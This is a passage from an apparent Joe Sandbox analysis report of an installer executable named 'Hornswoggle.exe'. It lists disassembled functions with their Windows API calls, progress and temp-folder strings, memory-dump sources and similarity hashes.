                                                        • SetTextColor.GDI32(?,00000000), ref: 004040F4
                                                        • SetBkMode.GDI32(?,?), ref: 00404100
                                                        • GetSysColor.USER32(?), ref: 00404113
                                                        • SetBkColor.GDI32(?,?), ref: 00404123
                                                        • DeleteObject.GDI32(?), ref: 0040413D
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404147
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
                                                        • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55
                                                        Function 00402C17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402C2F
                                                        • GetTickCount.KERNEL32 ref: 00402C4D
                                                        • wsprintfA.USER32 ref: 00402C7B
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402CAD
                                                          • Part of subcall function 00402BFB: MulDiv.KERNEL32(000B566A,00000064,000B8A01), ref: 00402C10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
                                                        • Opcode ID: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                        • Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
                                                        • Opcode Fuzzy Hash: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                        • Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E
                                                        Function 00404947 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
                                                        • GetMessagePos.USER32 ref: 0040496A
                                                        • ScreenToClient.USER32(?,?), ref: 00404984
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
                                                        • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5
                                                        Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                        • GlobalFree.KERNEL32(?), ref: 0040276F
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                        • Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
                                                        • Opcode Fuzzy Hash: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                        • Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98
                                                        Function 0040483D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(Festremser Setup: Completed,Festremser Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                        • wsprintfA.USER32 ref: 004048E3
                                                        • SetDlgItemTextA.USER32(?,Festremser Setup: Completed), ref: 004048F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$Festremser Setup: Completed
                                                        • API String ID: 3540041739-2766138748
                                                        • Opcode ID: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
                                                        • Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
                                                        • Opcode Fuzzy Hash: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
                                                        • Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8
                                                        Function 00402B9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0
                                                          • Part of subcall function 00402BFB: MulDiv.KERNEL32(000B566A,00000064,000B8A01), ref: 00402C10
                                                        • wsprintfA.USER32 ref: 00402BCE
                                                        • SetWindowTextA.USER32(?,?), ref: 00402BDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 3537556175-1158693248
                                                        • Opcode ID: 65f3f8e2d2ec534689718060328c8fe9c8f3efb2befb17072f1eb4ac46e499d2
                                                        • Instruction ID: 452401c706e3d4b7d528196fec4e840a2acb2731f509fc9f744d6656898438ee
                                                        • Opcode Fuzzy Hash: 65f3f8e2d2ec534689718060328c8fe9c8f3efb2befb17072f1eb4ac46e499d2
                                                        • Instruction Fuzzy Hash: ABF0F0B18001049FDF014F60EE08AAE37B8EB04304F04807BF542F50D2D7B9AD46CB68
                                                        Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?), ref: 00401CE2
                                                        • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                        • Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
                                                        • Opcode Fuzzy Hash: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                        • Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79
                                                        Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401D3B
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                        • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID:
                                                        • API String ID: 3808545654-0
                                                        • Opcode ID: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
                                                        • Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
                                                        • Opcode Fuzzy Hash: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
                                                        • Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F
                                                        Function 00403AA8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,00422F20), ref: 00403B40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: TextWindow
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$1033$Festremser Setup: Completed
                                                        • API String ID: 530164218-2631969466
                                                        • Opcode ID: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
                                                        • Instruction ID: 4ecc7a7cce5d2b157b8937249730f08b858357f8198c33761da0ca3de106299a
                                                        • Opcode Fuzzy Hash: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
                                                        • Instruction Fuzzy Hash: CE11C971B006119BC7309F55DC909737B7CEB8571A364817FD90167391D73DAD029A58
                                                        Function 004058D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058DB
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058E4
                                                        • lstrcatA.KERNEL32(?,00409014), ref: 004058F5
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058D5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3355392842
                                                        • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction ID: 3de60a59262c475c5440d19c682801eda6224deee4fb27ea49e877a9fa99e37c
                                                        • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction Fuzzy Hash: A6D0A972605A303AD20233198C05E8B3A08CF26351B040032F641B22A2CA7C0E418BFE
                                                        Function 0040596E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 0040597C
                                                        • CharNextA.USER32(00000000), ref: 00405981
                                                        • CharNextA.USER32(00000000), ref: 00405995
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\
                                                        • API String ID: 3213498283-3404278061
                                                        • Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                        • Instruction ID: 93fa8612b98c37d3538e1dab61372dab2b439c5e428625c22ffade58a408e5cb
                                                        • Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
